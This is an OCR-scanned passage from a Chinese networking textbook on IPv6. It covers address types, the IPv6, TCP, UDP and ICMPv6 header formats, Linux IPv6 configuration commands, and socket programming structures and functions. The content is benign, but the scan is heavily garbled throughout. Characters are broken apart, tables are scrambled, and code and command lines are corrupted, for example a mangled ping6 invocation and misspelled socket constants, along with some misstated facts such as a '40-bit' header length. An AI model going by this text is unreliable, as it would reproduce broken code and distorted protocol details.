15.3.3 ”本 地 使 用 单 播 地址 

本 地 单 播 地 址 的 传送 范围 限于 本 地 ， 又 分 为 链 路 本 地 地 址 和 站 点 本 地 地 址 两 类 ， 分 别 
适用 于 单条 链 路 和 一 个 站 点 内 。 

1. 链 路 本 地 地 址 

链 路 本 地 地 址 ， 格 式 前 级 为 1111111010， 用 于 同一 链 路 的 相 邻 节点 间 通 信 。 链 路 本 地 
地 址 用 于 邻居 发 现 ， 且 总 是 自动 配置 的 ， 包 含 链 路 本 地 地 址 的 包 不 会 被 IPv6 路 由 器 转发 ， 
格式 如 表 15.3 所 示 。 


口 
口 


表 15.3 链 路 本 地 地 址 


0 a 


2. 站 点 本 地 地 址 


站 点 本 地 地 址 ， 格 式 前 级 为 1111111011 ， 相 当 于 10.0.0.0/8 、172.16.0.0/12 和 
192.168.0.0/16 等 IPv4 私 用 地 址 空间 。 例 如 企业 专用 局 域 网 ， 如 果 没 有 连接 到 IPv6 Internet 
上 上， 在 企业 内 部 可 以 使 用 本 地 站 点 地 址 ， 其 他 站 点 不 能 访问 站 点 本 地 地 址 ， 包 含 站 点 本 地 
地 址 的 包 不 会 被 路 由 器 转发 到 企业 专用 局 域 网 之 外 。 一 个 站 点 通常 是 位 于 同一 地 理 位 置 的 
机 构 网 络 或 子 网 。 与 链 路 本 地 地 址 不 同 的 是 ， 站 点 本 地 地 址 不 是 自动 配置 的 ， 而 必须 使 用 
无 状态 或 全 状态 地 址 配置 服务 。 

IPv6 自动 进行 重 编号 ， 如 表 15.4 所 示 。 


表 15.4 站 点 本 地 地 址 


mim | 0 | 有 和 DT 
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15.3.4 ”兼容 性 地 址 

在 从 IPv4 地 址 向 IPv6 地 址 的 迁移 过 渡 期 ， 两 类 地 址 并 存 ， 所 以 还 有 一 些 特殊 的 地 址 
类 型 。 

1. IPv4 兼容 地 址 

为 了 与 IPv4 地 址 地 址 相 兼 容 ，IPv6 支持 一 种 IPv4 兼容 地 址 ， 这 种 地 址 在 原 有 IPv4 地 
址 的 基础 上 构造 IPv6 地 址 。 通 过 在 IPv6 的 低 32 位 上 携带 IPv4 的 IP 地 址 ， 使 具有 IPv4 
和 IPv6 两 种 地 址 的 主机 可 以 在 IPv6 网 络 上 进行 通信 。 这 种 地 址 的 表示 格式 为 
“0:0:0:0:0:0:a.b.c.d” 或 者 “:: a.b.c.d ”， 其 中 “a.b.c.d ”是 点 分 十 进 制 表示 的 IPv4 地 址 。 
这 种 “兼容 IPv4 的 IPv6 地 址 ”的 表示 方式 如 表 15.5 所 示 。 

表 15.5 兼容 IPv4 的 1IPv6 地 址 


0 0000 IPv4 地 址 
80 位 32 位 
例如 ， 一 个 主机 的 IPv4 地 址 为 “192.168.0.1”， 其 IPv6 的 兼容 地 址 为 “::192.168.0.1”。 
2. IPv4 映射 地 址 


IPv4 兼容 地 址 用 于 具有 IPv4 和 IPv6 双 栈 的 主机 在 IPv6 网 络 上 的 通信 ,而今 ed IPv4 
协议 栈 的 主机 可 以 使 用 IPv4 映射 地 址 在 IPv6 网 络 上 进行 通信 。IPv4 映射 地 址 是 另 一 种 内 
柑 IPv4 地 址 的 IPv6 地 址 , 它 的 表示 格式 为 “0:0:0:0:0:FFFF: a.b.c.d ”或 “::FFFF: 2 Te 
使 用 这 种 地 址 时 ， 需 要 应 用 程序 支持 IPv6 地 址 和 IPv4 地 址 。 这 种 “映射 IPv4 的 IPv6 地 
址 ”的 表示 方式 如 表 15.6 所 示 。 


表 15.6 映射 IPv4 的 IPv6 地 址 


0 /rm IPv4 地 址 
80 位 32 位 


例如 ， 一 个 主机 的 IPv4 地 址 为 “192.168.0.1 ”， 其 IPv6 的 映射 地 址 为 
“::FFFF:192.168.0.1”。 


3. 6to4 地 址 


IPv6 地 址 中 嵌入 IPv4 地 址 的 表示 方法 用 于 在 IPv6 的 地 址 上 进行 通信 ,如 果 网 络 是 IPv4 
协议 , 则 需要 使 用 6to4 地 址 。6to4 地 址 用 于 在 IPv4 地 址 上 支持 IPv4 和 IPv6 两 种 协议 的 节 
点 间 的 通信 。 

6to4 方式 通过 多 种 技术 在 主机 和 路 由 器 间 传 递 IPv6 数据 分 组 。 


15.3.5 ”IPv6 多 播 地 址 


IPv6 的 多 播 与 IPv4 运作 相同 。 多 播 可 以 将 数据 传输 给 组 内 所 有 成 员 。 组 的 成 员 是 动 
态 的 ， 成 员 可 以 在 任何 时 间 加 入 或 者 退出 一 个 组 。IPv6 多 播 地 址 格式 前 级 为 11111111， 此 
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外 还 包括 标志 〈Flags)、 范 围 域 和 组 ID 等 字段 ， 如 表 15.7 所 示 。 
表 15.7 IPv6 多 播 地 址 格式 


11111111 组 ID 
8 位 112 位 


口 前 级 为 8 位 ， 值 为 0xFF， 表 示 地 址 为 IPv6 多 播 地 址 。 

口 标志 为 4 位 ， 表 示 为 000T。 其 中 高 三 位 保留 ， 必 须 初始 化 成 0。T=0 表示 一 个 被 
IANA 永久 分 配 的 多 播 地 址 ，T=1 表示 一 个 临时 的 多 播 地 址 。 

口 范围 为 4 位， 表示 一 个 多 播 范围 域 ， 用 来 限制 多 播 的 范围 。 表 15.8 列 出 了 范围 字 


段 值 及 其 含义 。 
表 15.8 范围 值 及 含义 
什 | 合 义 
0 | 8 | 机构 本 地 范围 
! | 点 本 地 范围 ”| EE | 全 球 苑 围 
2 | 链 跌 地 范围 | F | 人 
5 站 点 本 3 用 | | 


口 组 ID 为 112 位 ， 标 识 一 个 给 定 范围 内 的 多 播 组 。 

例如 ， 地 址 “FF02:0:0:0:0:0:0:1 ”表示 链 路 地 址 的 所 有 节点 地 址 ， 地 址 
“FF02:0:0:0:0:0:0:2” 表 示 链 路 地 址 的 所 有 路 由 器 地 址 ， 地 址 “FF05:0:0:0:0:0:0:2” 表 示 站 
点 本 地 的 所 有 路 由 器 地 址 。 


15.3.6 1IPv6 任 播 地 址 


IPv6 的 任 播 地 址 是 一 组 接口 的 集合 ， 这 些 接口 通常 属于 不 同 的 节点 。 数 据 向 任 播 地 址 
发 送 的 时 候 ， 会 发 送 到 路 由 算法 中 距离 最 近 的 - -个 接口 。 多 播 地 址 是 一 对 多 的 通信 ， 即 接 
收 方 是 多 个 接口 ， 任 播 地 址 是 一 对 一 组 中 的 任 一 个 的 场合 ， 发 送 方 可 以 从 - 
一 个 。 路 由 器 任 播 地 址 必须 经 过 预定 义 ， 该 地 址 从 子 网 前 缀 中 产生 。 为 构造 
路 由 器 任 播 地 址 ， 子 网 前 缀 必须 固定 ， 余 下 的 位 数 置 为 全 0， 如 表 15.9 所 示 。 


表 15.9 1IPv6 任 播 地 址 格式 
子 网 前 组 000...000 
n 位 128-n 位 


15.3.7 主机 的 多 个 IPv6 地 址 


即使 一 个 主机 只 有 一 个 单 接口 , 该 主机 也 可 以 有 多 个 IPv6 地 址 。 即 可 以 同时 拥有 以 下 
几 种 单 点 传送 地 址 : 

口 每 个 接口 的 链 路 本 地 地 址 ; 

口 每 个 接口 的 单 播 地 址 〈 可 以 是 一 个 站 点 本 地 地 址 和 一 个 或 多 个 可 聚集 全 球 地 址 ) ; 

口 回环 (loopback) 接口 的 回环 地 址 〈::1) 。 

此 外 ， 每 台 主 机 还 需要 时 刻 保持 收听 以 下 多 播 地 址 上 的 信息 : 
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节点 本 地 范围 内 所 有 节点 组 播 地 址 (FF01::1) ; 

链 路 本 地 范围 内 所 有 节点 组 播 地 址 (FF02::1) ; 

请 求 节点 (solicited-node) 组 播 地 址 〈 如 果 主 机 的 某 个 接口 加 入 请 求 节点 组 ) ; 
组 播 组 组 播 地 址 〈 如 果 主 机 的 某 个 接口 加 入 任何 组 播 组 ) 。 


DOODO 


15.4 ”IPv6 的 头 部 


IPv6 的 包头 共 40 个 字 节 , 其 中 包含 了 IPv6 的 主要 概念 。 主 要 有 版 本 号 、 业 务 流 类 别 、 
流标 签 、 负 载 长 度 、 下 一 个 头 、 跳 限 、 原 始 IP 地 址 和 目的 IP 地 址 等 选项 。 相 对 于 IPv4 的 
头 部 ，IPv6 的 头 部 要 简单 一 些 ， 这 方便 路 由 和 网 关 等 设备 的 大 数据 量 计算 。 


15.4.1 1IPv6 头 部 格式 
如 图 15.1 所 示 为 IPv6 包头 的 格式 。 


0 1 2 345 67 89 10 11121314151617 18 1920 2122 23 24 25 26 27 28 29 30 31 
版 本 业务 流 类 别 流标 签 4 
负载 长 度 下 二 个头 跳 限 8 


原始 IP 地 址 20 


目的 IP 地 址 


图 15.1 IPv6 的 包头 


在 IPv4 中 , 所 有 包头 以 32 位 为 单位 , 即 以 4 个 字 节 为 长 度 单 位 。 在 IPv6 中 的 头 部 中 ， 
长 度 是 以 64 位 为 一 个 单位 。 下 面 是 IPv6 协议 的 包含 字段 含义 。 

口 版 本 字段 : 表示 协议 版 本 号 ， 长 度 为 4 位 ， 对 于 IPv6， 该 字段 必须 为 6。 

口 类 别 字段 : 表示 报 文 的 类 别 和 优先 级 ， 它 与 IPv4 的 服务 类 型 字段 的 含义 类 似 。 字 
段 的 长 度 为 8 位， 该 字段 的 默认 值 是 全 0。 

口 流标 签字 段 : 用 于 标识 属于 同一 业务 流 的 包 ， 是 IPv6 的 新 增 字段 ， 长 度 为 20 位 。 

口 净 荷 长 度 字段 : 表示 报 文中 的 有 效 载 荷 的 长 度 , 它 与 IPv4 头 部 的 总 长 度 字段 不 同 ， 
这 个 字段 的 值 不 包含 头 部 的 长 度 。 它 没有 将 IPv6 的 40 位 报头 计算 在 内 ， 只 计算 
报头 后 面 的 扩展 和 数据 部 分 的 长 度 。 字 段 的 长 度 为 16 位 ， 最 多 可 以 表示 长 度 为 
64KB 有 效 数据 载荷 。 

口 下 一 个 头 字 段 : 与 IPv4 头 部 的 协议 字段 相似 ， 但 略 有 不 同 。IPv4 的 IP 协议 的 上 
层 协 议 ，TCP 和 UDP 协议 始终 在 IP 包头 后 面 ， 而 IPv6 的 扩展 部 分 可 以 放 在 包头 
部 分 。 扩 展 部 分 字段 可 以 用 来 表示 验证 、 加 密 和 分 片 等 功能 。 
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口 跳 限 字段 : 与 IPv4 中 的 生存 时 间 字 段 含义 类 似 ， 它 表示 包 经 过 的 路 由 器 个 数 。 包 
在 转发 的 过 程 中 ,每 经 过 一 个 路 由 器 ， 这 个 字段 的 值 就 会 减 去 1， 如 果 这 个 字段 的 
值 为 0 后 ， 报 文 就 会 被 丢弃 。 这 个 字段 的 长 度 为 8 位 。 

口 源 地址 字段 ， 表示 发 送 数据 报 文 主机 的 IP 地 址 ， 字 段 的 长 度 为 128 位 。 

口 目的 地 址 字段 : 表示 接受 数据 的 目的 主机 的 卫 地 址 ， 这 个 地 址 可 以 使 一 个 单 播 、 
组 播 或 任意 点 播 地 址 ， 字 段 的 长 度 为 128 位 。 

虽然 IPv6 报头 的 字 节 长 度 两 倍 于 Ipv4 报头 (40 个 字 节 与 20 个 字 节 ), 但 IPv6 对 报头 

结构 进行 了 精简 。IPv6 的 报头 丢弃 了 IPv4 字段 中 的 几 个 ， 从 而 使 得 数据 的 处 理 更 有 效率 。 


15.4.2 与 IPv4 头 部 的 对 比 
IPv6 协议 的 头 部 与 IPv4 的 头 部 结构 不 同 ，IPv4 的 头 部 如 图 15.2 所 示 。 


0 15 16 31 


版 本 (4 位 ) | 首部 长 度 (4 位 ) 。” 服务 类 型 (8 位 ) 总 长 度 (16 位 ) 


标识 (16 位 ) 片 偏 移 (13 位 ) 
生存 时 间 TTL(8 位 ) 协议 类 型 (8 位 ) 头 部 校 验 和 (16 位 ) 
源 IP 地 址 (32 位 ) | 
目的 IP 地 址 (32 位 ) 
选项 (32 位 ) 


数据 


图 15.2 IPv4 的 头 部 结构 

两 种 协议 的 头 部 主要 有 如 下 不 同 。 

口 版 本 字段 在 两 种 协议 中 没有 变化 ，IPv4 中 为 4，IPv6 中 为 6， 表示 两 种 不 同 的 协议 
类 型 。 

口 IPv6 丢弃 了 IPv4 的 首部 长 度 、 服 务 类 型 、 标 识 、 标 志 、 片 偏 移 和 头 部 校 验 和 字段 。 
总 长 度 、 生 存 时 间 和 协议 类 型 字段 在 IPv6 中 有 了 新 名 字 ， 功 能 稍微 进行 了 重新 
定义 。 

口 IPv4 中 的 选项 字段 已 从 报头 中 消失 ， 改 为 扩展 功能 。 

口 IPv6 加 入 了 两 个 新 字段 : 流量 类 别 和 流标 记 。 


15.4.3 1IPv6 的 TCP 头 部 


IPv6 协议 的 TCP 头 部 如 图 15.3 所 示 ， 包 含 发 送 数据 主机 的 源 端 口号 、 接 收 数据 主机 
的 目的 端口 号 、 发 送 数据 的 序列 号 、 上 一 个 报 文 的 应 答 号 、 窗 口 大 小 、 当 前 报 文 分 片 前 的 
偏 移 量 、 校 验 和 及 紧急 数据 的 偏 移 量 指针 等 。 
15.4.4 ”IPv6 的 UDP 头 部 

IPv6 的 UDP 头 部 与 TCP 相似 ， 包 含 发 送 端的 源 端口 号 、 接 收 端 的 目的 端口 号 、UDP 
数据 的 长 度 和 校 验 和 。IPv6 协议 的 UDP 头 部 如 图 15.4 所 示 ， 它 的 含义 与 IPv4 相同 。 
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0 .12 3456789 10 11 12 13 14 15 16 171819 202122 232425 26 27 28 29 30 31 


源 端 口 | 目的 端口 4 

序列 号 8 

应 答 号 12 

偏 移 量 保留 标志 (UAPRSF ) | 窗口 je 
校 验 和 | 紧急 指针 20 

选项 24 


图 15.3 IPv6 的 TCP 头 部 


0 12 3456789 10 11 12 13 14 15 16 171819 20 2122 23 2425 26 27 28 29 30 31 
源 沁 0 目的 端口 | 4 


长 度 校 验 和 8 


图 15.4 IPv6 的 UDP 头 部 


15.4.5 ”IPv6 的 ICMP 头 部 
如 图 15.5 所 示 ，IPv6 的 ICMP 头 部 基本 结构 与 IPv4 的 相同 ， 但 是 其 含义 发 生 了 很 大 
的 变化 ,IPv6 的 ICMP 叫做 ICMPv6, 主要 包含 IPv6 的 控制 信息 ,具体 值 和 含义 参见 表 15.10 
所 示 。 
0 12 3456789 10 11 12 13 14 15 16 1718 19 202122 232425 26 27 28 29 30 31 
类 型 代码 校 验 和 4 


消息 体 


图 15.5 IPv6 的 ICMP 头 部 


表 15.10 IPv6 的 错误 消息 和 错误 类 型 
消息 类 型 含义 消息 代码 


消息 代码 含义 
表示 不 能 路 由 到 目的 


SS 


1 表示 不 能 和 目的 管理 通信 
2 表示 超出 原 地 址 范围 
1 表示 地 址 不 可 达 
人 3 表示 地 址 不 可 达 
4 表示 源 地 址 不 能 
5 表示 拒绝 路 由 到 目的 地 
2 表示 包 过 大 0 
0 表示 传输 时 超出 跳 限 
3 表示 超时 
多 1 表示 分 片 重组 超时 
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消息 类 型 消息 类 型 含义 消息 代码 消息 代码 含义 
0 表示 头 部 错误 
4 表示 参数 问题 | 表示 不 能 识别 的 下 一 个 头 部 
表示 不 能 识别 的 IPv6 选项 
100/101 | 表示 私有 部 分 
jo 表示 ICMPv6 错误 消息 扩展 保留 
128 表示 ECHO 请 求 
129 表示 ECHO 响应 
130 表示 多 播 侦 听 队列 
131 表示 多 播 侦 听 报告 
132 表示 多 播 侦 听 完 成 
133 表示 路 由 请 求 
134 表示 路 由 宣告 
135 表示 邻居 请 求 
136 表示 邻居 宣告 
137 表示 重 定向 
0 表示 路 由 器 再 计数 命 
138 表示 路 由 器 再 计数 1 表示 路 由 器 再 计数 完成 
255 表示 序列 号 重 置 
139 表示 ICMP 节点 信息 队列 
140 表示 ICMP 节点 信息 响应 
141 表示 反 向 邻居 请 求 
142 表示 反 向 邻居 宣告 信息 
143 表示 多 播 侦 听 报告 版 本 2 
144 表示 ICMP 家 庭 代 理 地 址 发 现 请 求 消息 
145 表示 ICMP 家 庭 代 理 地 址 发 现 响应 消息 
146 表示 ICMP 移动 前 级 请 求 消息 
147 表示 ICMP 移动 签注 宣告 消息 
148 表示 确认 路 径 请 求 消 4 
149 表示 确认 路 径 宣 告 消息 
151 表示 多 播 路 由 宣告 
152 表示 多 播 路 由 请 求 
153 表示 多 播 路 由 终止 
200 表示 私有 
201 表示 扩展 使 用 
255 表示 ICMPv6 扩展 使 用 
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15.5 ”IPv6 运行 环境 


在 Linux 下 运行 和 配置 IPv6 网 络 协议 栈 十 分 容易 ， 在 Linux 的 2.4 版 本 的 内 核 中 已 经 
加 入 了 对 IPv6 的 支持 。 配 置 IPv6 的 运行 环境 主要 包含 内 核 模块 和 应 用 层 的 交互 两 个 方面 。 


15.5;1 


要 在 Linux 下 运行 IPv6 的 程序 ， 需 要 先 查看 本 系统 中 是 否 已 经 加 载 了 IPv6 的 协议 栈 ， 
使 用 ifeonfig 命令 看 一 下 网 卡 的 设置 状况 。 


$ ifconfig 


eth0 


1o 


IPv6 的 地 址 在 inet6 部 分 ， 本 机 的 IPv6 地 址 为 fe80::20c:29ff:fe1f:35/64。 


加 载 IPv6 模块 


Link encap: 以 太 网 硬件 地 址 00:0c:29:1f:00:35 


inet 地 址 :192.168.83.188 广播 :192.168.83.255 掩 码 :255.255.255.0 


inet6 地 址 : fe80::20c:29ff:felf:35/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 跃 点 数 :1 
接收 数据 包 :23791 错误 :0 丢弃 :0 过 载 :0 帧 数 :0 

发 送 数据 包 :3070 错误 :0 丢弃 :0 过 载 :0 载波 :0 

碰撞 :0 发 送 队列 长 度 :1000 

接收 字 节 :6092130 (6.0 MB) 发送 字 节 :250326 (250.3 KB) 
中 断 :19 基本 地 址 :0x2000 


Link encap: 本 地 环 回 

inet 地 址 :127.0.0.1 掩 码 :255.0.0.0 

inet6 地 址 : ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:16436 跃 点 数 :1 

接收 数据 包 :1065 错误 :0 丢弃 :0 过 载 :0 帧 数 :0 

发 送 数据 包 :1065 错误 :0 丢弃 :0 过 载 :0 载波 :0 

碰撞 :0 发 送 队列 长 度 :0 

接收 字 节 :82763 (82.7 KB) 发送 字 节 :82763 (82.7 KB) 


如 果 没 有 inet6， 此 项 内 容 可 以 加 载 IPv6 内 核 ， 使 用 如 下 命令 加 载 : 


#modprobe ipv6 


然后 设置 本 地 IPv6 的 地 址 。 


#ifconfig eth0 inet6 add fe80::20c:29ff:felf:35/64 


15.5.2 ”查看 是 否 支 持 IPv6 
1. 使 用 命令 ping 来 检测 网 卡 的 IPv6 地 址 


IPv4 地 址 类 型 的 网 络 ping 的 使 用 不 需要 指定 网 络 接口 ， 系 统 会 自动 选择 。 在 IPv6 中 ， 
命令 ping6 时 必须 指定 一 个 网 卡 接口 ， 和 否则 系统 将 不 知道 将 数据 包 发 送 到 那个 网 络 设 


使 


备 ，I 表 示 Interface、eth0 是 第 一 个 网 卡 、c 表示 回路 ，3 表示 ping6 操作 3 次 。 


pinge =T ethQ =e 3 fe80s:200:29ff: fe1f:35 
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2. 使 用 ip 命令 


记 命令 是 iproute2 软件 包 里 一 个 强大 的 网 络 配置 工具 ， 它 将 一 些 传统 的 命令 功能 包含 
在 内 。 如 ifeonfig、route 等 。 
(1) 使 用 外 命令 查看 IPv6 的 路 由 表 。 


$ /sbin/ip -6 route show dev eth0 


(2) 使 用 “route” 命 令 添加 一 个 路 由 表 。 

$/sbin/route -A inet6 add 2000::/3 gw 3ffe:ffff:0:f101::1 

(3) 用 ip 命令 设 定 IPv6 的 多 点 传播 。 

IPv6 的 网 络 邻 居 发 现 继承 了 IPv4 的 ARP(Address Resolution Protocol 地 址 解析 协议 )， 
可 以 重新 得 到 网 络 邻 居 的 信息 ， 并 且 可 以 编辑 /删除 它 。 使 用 IP 命令 可 以 知道 网 络 邻 居 的 
设 定 〈 其 中 ，00:01:24:45:67:89 是 网 络 设 备 的 数据 链 路 层 的 MAC 地 址 )。 


#ip -6 neigh show fe80::201:23ff:fe45:6789 dev eth0 11 addr 00:01:24:45:67:89 


15.6 ”IPV6 的 结构 定义 


网 络 协议 栈 的 结构 定义 是 对 协议 进行 的 说 明 ，IPv6 的 结构 定义 在 文件 sys/socketh 中 ， 
主要 有 地 址 族 、 协 议 族 、IPv6 的 套 接 字 结 构 等 结构 。 这 些 结构 有 的 和 IPv4 兼容 ， 有 的 是 
全 新 进行 定义 的 结构 ， 在 进行 程序 设计 的 时 候 需 要 注意 。 

15.6.1 1IPv6 的 地 址 族 和 协议 族 

IPv6 新 定义 了 一 个 地 址 族 和 协议 族 常 量 来 表示 其 地 址 族 和 协议 族 ， 常 量 在 文件 
<sys/socket.h> 中 定义 。 地 址 族 为 常量 AF_INET6， 用 来 表示 与 IPv4 的 不 同 。 同 时 定义 了 
PF_INET6 表示 协议 族 ， 这 个 变量 也 在 <sys/socket.h> 中 定义 ， 这 两 个 常量 的 值 是 相同 的 ， 
因为 有 : 


#define PF INET6 REF INET6 


15.6.2” 套 接 字 地 址 结构 


IPv6 的 地 址 为 128 位 ， 与 IPv4 的 32 位 地 址 显著 不 同 ， 所 以 定义 了 一 个 新 的 结构 表示 
IPv6 的 地 址 。 


1， 新 的 IPv6 地 址 结构 in6_addr 
新 的 结构 为 struct in6_addr， 定 义 如 下 : 


struct in6 addr{ 
Uint8 t s6 addr[16]; /* IPv6 地址 */ 
}; 
这 个 结构 在 文件 <netinet/in.h> 中 定义 ， 它 包含 16 个 8 位 的 元 素 ， 表示 IPv6 的 地 址 ， 
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以 网 络 字 节 序 保存 。 还 有 如 下 的 联合 定义 方式 : 


struct in6 addr { 


union { 
uint8 t _S6 u8[16]; /*16 个 8 位 变量 */ 
uint32 t S6 u32[4]; /*4 个 32 位 变量 */ 
uint64 t S6 u64[2]; /*2 个 64 位 变量 */ 
} _S6 un; 


jy 
#define s6 addr S56 un. S6 u8 


2. 新 的 IPv6 套 接 字 地 址 结构 sockaddr_in6 


与 IPv4 的 地 址 结构 struct sockaddr_in 相对 应 ,IPv6 定义 了 一 个 新 的 地 址 结构 表示 IPv6 
的 套 接 字 地 址 ， 结 构 定 义 的 文件 <netinet/in.h> 中 ， 原 型 如 下 : 


struct sockaddr in6 { 


sa family t sin6 family; /*AF_INET6 协议 族 */ 
dnpGrt st sin6 port; /* 端 口 地 址 */ 

uint32 七 sin6 flowinfo; /*IPV6 传输 类 信息 */ 
struct in6 addr sin6 addr; /*IPV6 地 址 */ 
ulint32t sin6 scope id; /* 网 络 接 口 范 围 */ 


}; 

其 中 的 成 员 sin6_family 必须 定义 为 AF_INET6， 表 示 IPv6 地 址 族 。 

3. IPv4 地 址 结构 和 IPv6 地 址 结构 的 对 比 

IPv4 的 地 址 结构 通过 struct in_addr 和 struct sockaddr in 定义 ， 结 构 定 义 分 别 如 下 : 


struct sockaddr_ in 


Uf 


u_char sin len; 

u_char sin family; 
u_short sin port; 

struct in addr sin addr; 
char sin zero[8]; 


}; 
struct in addr 
{ 
int32 t 3 addry 
}; 


IPv6 的 地 址 结构 通过 struct in6_addr 和 struct sockaddr in6 定义 ， 结 构 定 义 分 别 如 下 : 


struct sockaddr in6 


{ 


u char sin6 len; 

u char sin6 family; 

u int16 七 sin6 port; 
Wint32 七 sin6 flowinfo; 
struct in6 addr sin6 addr; 

UL int32 七 sin6_ scope id; 


] 
struct in6 addr 


u int8 t _u6 addr8[16]; 
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] 7 


IPv4 地 址 结构 中 的 sin_zero[8] 字 段 ， 是 为 了 增强 系统 的 可 扩展 性 而 设计 的 ， 由 于 IPv6 
的 变动 很 大 ， 这 个 结构 不 能 满足 要 求 ， 因 此 IPv6 中 不 再 使 用 这 个 字段 。IPv6 的 扩展 采用 
了 可 扩展 头 部 的 方法 。 结 构 sockaddr in6 中 的 成 员 sin6_flowinfo 是 IPv6 用 于 设置 流标 记 和 
流量 类 型 的 。 成 员 sin6_scope_id 用 于 设置 IPv6 地 址 的 作用 范围 ， 表 明 此 地 址 是 全 球 、 站 
点 还 是 本 地 连接 类 型 的 全 地 址 。 


15.6.3 ”地 址 兼容 考虑 


为 了 与 之 前 的 IPv4 地 址 兼容 , IPv6 的 地 址 可 以 将 IPv4 的 地 址 映射 到 IPv6 地 址 的 一 间 
分 。 把 IPv4 的 地 址 放 到 IPv6 地 址 的 低 32 位 ， 并 且 高 96 位 为 0:0:0:0:FFFF， 这 样 IPv4 到 
IPv6 的 映射 为 如 下 的 方式 : 


: :FEFF:<IPv4 地 址 > 


15.6.4 1IPv6 通用 地 址 
在 头 文件 <netinet/in.h> 中 定义 了 一 个 通用 的 IPv6 地 址 ， 其 作用 与 IPv4 的 INADDR_ 
ANY 相似 ， 可 以 用 于 绑 定 任意 的 本 地 地 址 。 
extern const struct in6 addr in6addr any; 
例如 ， 将 一 个 IPv6 类 型 的 地 址 结构 绑 定 到 23 端口 的 任意 本 地 地 址 ， 代 码 如 下 : 
struct sockaddr in6 sin6; 


sin6.sin6 family = AF INET6; 
sin6.sin6 flowinfo = 0; 
sin6.sin6 port = htons (23); 
sin6.sin6 addr = in6addr any; 


if (bind(s, (struct sockaddr *) &sin6, sizeof (sin6)) == -1) 


还 有 一 个 常量 IN6ADDR_ANY _INIT 用 于 指定 本 地 的 任意 IP 地 址 ， 在 文件 <netinet/ 
in.h> 中 定义 ， 例 如 : 


struct in6 addr anyaddr = IN6ADDR ANY INIT; 


与 IPv4 版 本 的 INADDR_xxx 常量 定义 为 主机 字 节 序 不 同 ,IPv6 版 本 的 IN6ADDR _xxx 
户 经 常 有 使 用 UDP 发 数据 包 或 者 使 用 TCP 协议 连接 本 地 的 情况 , 在 IPv4 中 有 一 个 
IPv4 常量 地 址 INADDR_LOOPBACK 方便 操作 ，IPv6 中 也 定义 了 这 样 一 个 变量 。 
in6addr_loopback 是 一 个 全 局 in6_addr 结构 类 型 的 变量 ,在 文件 <netinet/in.h> 中 有 如 下 定义 : 


extern const struct in6 addr in6addr loopback; 


在 IPv4 中 使 用 INADDR LOOPBACK 来 初始 化 本 地 环 回 变量 ， 而 在 IPv6 下 使 用 
IN6ADDR_LOOPBACK INIT 来 初始 化 in6addr loopback， 而 IPv4 的 定义 是 主机 字 节 序 的 
值 。IN6ADDR LOOPBACK INIT 定义 如 下 : 
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#define IN6ADDR LOOPBACK INIT { { { 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1 } } } 
使 用 环 回 变量 的 例子 如 下 : 


struct sockaddr in6 sin6; 


sin6.sin6 family = AF _ INET6; 
sin6.sin6 flowinfo = 0; 

sin6.sin6 port = htons (23) ; 
sin6.sin6 addr = in6addr loopback; 


if (connect(s, (struct sockaddr *) &sin6, sizeof (sin6)) == -1) 


15.7 IPvV6 的 套 接 字 函 数 


IPv6 的 套 接 字 函数 与 IPv4 的 套 接 字 函 数 是 基本 一 致 的 ， 所 发 生 的 改变 主要 集中 在 地 
址 结构 上 。 如 connect0 函 数 、send0 函 数 、recv() 函 数 、bind() 函 数 等 。 而 socket() 函 数 ， 虽 
然 函数 的 形式 是 一 致 的 ， 但 是 建立 IPv6 和 建立 IPv4 类 型 的 套 接 字 的 参数 不 一 样 。 

15.7.1 socket() 函 数 

socket() 函 数 的 原型 没有 发 生 改变 ， 但 是 在 建立 IPv6 协议 族 的 套 接 字 选项 时 发 生 了 
变化 。 

例如 ， 建 立 一 个 IPv4 流 式 套 接 字 的 代码 为 : 

Ss = socket (PF INET, SOCK_ STREAM, 0); 

建立 IPv4 数据 报 套 接 字 ， 应 用 层 采用 如 下 的 方式 : 


Ss = socket(PF_INET, SOCK DGRAM, 0); 


建立 IPv6 的 TCP 和 UDP 套 接 字 的 方式 是 直接 把 IPv4 中 的 PF_INET 蔡 换 成 PF_INET6。 
例如 ， 建 立 IPv6/TCP 套 接 字 为 : 

Ss = Socket (PEF_INET6，SOCK_STRERAM，0) 

建立 IPv6/UDP 套 接 字 为 : 


Ss = Socket(PF_INET6, SOCK DGRAM, 0); 


15.7.2 ”没有 发 生 改 变 的 函数 


当 建 立 一 个 PF_INET6 套 接 字 后 ， 必 须 使 用 地 址 结构 sockaddr in6 传递 给 其 他 调用 的 
参数 ， 如 下 面 的 函数 由 于 没有 包含 地 址 结构 ， 所 以 其 原型 没有 发 生变 化 。 

口 bind0); 

口 connect(); 


口 sendmsg(); 
口 sendto()。 
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15.7.3 ”发生 改变 的 函数 


由 于 下 面 的 函数 传 入 传 出 了 地 址 结构 ， 在 使 用 的 时 候 注意 地 址 的 改变 。 
accept(); 
recvfrom(); 


recvmsg(); 


DOOO 


getpeername(); 


口 getsockname()。 


其 实 这 些 函 数 的 
sockaddr 来 传送 的 ， 


IPv6 中 新 增加 了 
IPv6 的 通用 协议 选项 中 有 


分 主要 
15.8.1 


level (选项 级 别 ) 


IPPROTO _IPV6 


15.8 IPv6 的 套 接 字 选 项 


义 与 第 12 章 里 一 致 。 


型 不 用 发 生 改 变 ， 这 是 因为 地 址 结构 的 传 入 传 出 是 通 
需要 进行 强制 转换 。 


过 struct 


- 些 套 接 字 选项 和 ioctl 的 控制 命令 ， 本 节 将 对 其 进行 简要 介绍 。 在 
- 族 IPV6_xx 的 选项 名 ， 用 于 进行 IPv6 的 套 接 字 控制 。 
是 ICMPV6 部 分 ， 即 IPv6 的 ICMP 协议 控制 部 分 。 


IPv6 的 套 接 字 选项 


套 接 字 选项 分 别 增 加 了 级 别 IPPROTO_IPV6 和 IPPROTO_ICMPV56 的 部 
表 15.11 所 示 。 表 中 的 各 行 仿 


其 他 部 


分 ， 其 含义 如 


表 15.11 IPv6 的 套 接 字 选 项 
optname (选项 名 ) Optval ( 据 类 型 ) set 
表示 允许 套 接口 从 
IPV6 ADDRFORM IPv4 转换 到 IPv6, 反 V 
之 亦 可 
表示 原始 套 接 字 的 
IPV6_CHECKSUM 校 验 和 字段 偏 移 y 
IPV6 DSTOPTS 表示 接收 目标 选项 V 
表示 单 播 接收 路 由 
IPV6_HOPLIMIT hop 最 大 值 V 
表示 接收 路 由 hop 
IPV6 HOPOPTS 选项 Int V 
